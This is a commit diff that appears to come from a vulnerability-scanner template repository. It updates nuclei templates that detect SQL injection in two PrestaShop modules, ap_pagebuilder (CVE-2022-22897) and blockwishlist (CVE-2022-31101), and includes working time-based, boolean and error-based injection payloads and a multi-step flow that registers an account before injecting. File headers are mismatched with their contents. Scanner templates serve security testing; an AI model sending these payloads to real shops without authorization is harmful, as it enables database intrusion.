Merge pull request #14081 from projectdiscovery/presta-intrus-v2

Added new templates, fixed false positives, and enhanced others

Author: ritikchaddha

helpers/wordlists/adminer-paths.txt

@@ -19,25 +19,24 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2022-22897
     cwe-id: CWE-89
-    epss-score: 0.85193
-    epss-percentile: 0.99309
+    epss-score: 0.86131
+    epss-percentile: 0.99358
     cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
   metadata:
     verified: true
     max-request: 4
     vendor: apollotheme
-    product: "ap_pagebuilder"
+    product: ap_pagebuilder
     framework: prestashop
-    shodan-query:
-      - "http.component:\"Prestashop\""
-      - http.component:"prestashop"
+    shodan-query: http.component:"prestashop"
   tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev,vuln
 
 http:
   - raw:
       - |
         GET /modules/appagebuilder/config.xml HTTP/1.1
         Host: {{Hostname}}
+
       - |
         @timeout: 20s
         POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
@@ -47,17 +46,17 @@ http:
         X-Requested-With: XMLHttpRequest
 
         leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
+
       - |
-        @timeout: 20s
         POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
         Referer: {{RootURL}}
         X-Requested-With: XMLHttpRequest
 
         leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI
+
       - |
-        @timeout: 20s
         POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -66,8 +65,25 @@ http:
 
         leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
 
-    host-redirects: true
-    max-redirects: 3
+      - |
+        @timeout: 20s
+        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}
+        X-Requested-With: XMLHttpRequest
+
+        leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
+
+      - |
+        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}
+        X-Requested-With: XMLHttpRequest
+
+        leoajax=1&pro_add=-{{rand_int(0000, 9999)}})
+
     matchers-condition: or
     matchers:
       - type: dsl
@@ -77,6 +93,13 @@ http:
           - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
         condition: and
 
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration_5>=6'
+          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+        condition: and
+
       - type: dsl
         name: blind-based
         dsl:
@@ -86,6 +109,13 @@ http:
           - 'len(body_3) > 200 && len(body_4) <= 22'
         condition: and
 
+      - type: dsl
+        name: error-based
+        dsl:
+          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+          - 'contains(body_6, "You have an error in your SQL syntax")'
+        condition: and
+
     extractors:
       - type: regex
         name: version
@@ -94,4 +124,3 @@ http:
         group: 1
         regex:
           - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
-# digest: 4b0a0048304602210081d5ade544b7294a17cfeaa4b36e95ec35b0ee899d6e059a1322a7b67c9468fb022100fbff92c05e5da38c7eb58e0ae56e5fc3b561da7753d0b560d24b76ea43c5a642:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-22897.yaml

@@ -0,0 +1,217 @@
+id: CVE-2022-31101
+
+info:
+  name: Prestashop Blockwishlist 2.1.0 SQL Injection
+  author: mastercho
+  severity: high
+  description: |
+    Prestashop Blockwishlist module version 2.1.0 suffers from a remote authenticated SQL injection vulnerability.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31101
+    - https://github.com/PrestaShop/blockwishlist/security/advisories/GHSA-2jx3-5j9v-prpp
+    - https://packetstormsecurity.com/files/168003/Prestashop-Blockwishlist-2.1.0-SQL-Injection.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2022-31101
+    cwe-id: CWE-89
+    epss-score: 0.13829
+    epss-percentile: 0.93938
+    cpe: cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 8
+    vendor: prestashop
+    product: blockwishlist
+  tags: packetstorm,cve,cve2022,prestashop,prestashop-module,sqli,intrusive
+
+variables:
+  first_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
+  last_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
+  email: "{{randstr}}@{{rand_base(5)}}.com"
+  password: "{{rand_base(8)}}"
+
+flow: |
+  http(1) && http(2) && http(3) && http(4) && (template["id_wishlist"] && template["id_wishlist"][0] ? (http(7) && http(8)) : (http(5) && http(6) && http(7) && http(8)))
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/modules/blockwishlist/config.xml"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
+
+    host-redirects: true
+    max-redirects: 3
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+      - type: word
+        part: body
+        words:
+          - "Wishlist block"
+        internal: true
+
+      - type: dsl
+        name: version_check
+        dsl:
+          - compare_versions(version, '>= 2.0.0', '<= 2.1.0')
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 3
+
+    extractors:
+      - type: regex
+        name: id_product_raw
+        part: body
+        group: 1
+        regex:
+          - '/(\d+)-[a-z0-9\-]+\.html'
+        internal: true
+
+      - type: dsl
+        name: id_product
+        dsl:
+          - index(id_product_raw, 0)
+        internal: true
+
+  - raw:
+      - |
+        POST /{{login_path}}?create_account=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id_gender=1&firstname={{first_name}}&lastname={{last_name}}&email={{email}}&password={{password}}&birthday=&customer_privacy=1&psgdpr=1&submitCreate=1
+
+    payloads:
+      login_path:
+        - login
+        - en/login
+        - fr/login
+        - de/login
+        - pl/login
+        - es/login
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - regex('PrestaShop-[0-9a-f]{32}', header)
+          - status_code == 302
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id_wishlist"'
+          - '"nbProducts"'
+          - '"name"'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        name: id_wishlist_raw
+        part: body
+        json:
+          - .wishlists[0].id_wishlist
+        internal: true
+
+      - type: dsl
+        name: id_wishlist
+        dsl:
+          - index(id_wishlist_raw, 0)
+        internal: true
+
+  - id: create-wishlist
+    raw:
+      - |
+        GET /module/blockwishlist/action?action=createNewWishlist&params[name]=123 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success"'
+        internal: true
+
+  - id: fetch-new-wishlist
+    raw:
+      - |
+        GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: id_wishlist_raw
+        part: body
+        group: 1
+        regex:
+          - '"id_wishlist":"(\d+)"'
+        internal: true
+
+      - type: dsl
+        name: id_wishlist
+        dsl:
+          - 'index(id_wishlist_raw, 0)'
+        internal: true
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id_wishlist"'
+          - '"nbProducts"'
+          - '"name"'
+        condition: and
+        internal: true
+
+  - id: add-product
+    raw:
+      - |
+        POST /module/blockwishlist/action?action=addProductToWishlist&params[id_product]={{id_product}}&params[idWishList]={{id_wishlist_raw}}&params[quantity]=1&params[id_product_attribute]=0 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+        internal: true
+
+  - id: sql-inj
+    raw:
+      - |
+        GET /module/blockwishlist/view?id_wishlist={{id_wishlist_raw}}&order=p.name,%20(select%20case%20when%20(1=1)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration >= 7'
+          - 'contains(to_lower(body), "prestashop")'
+        condition: and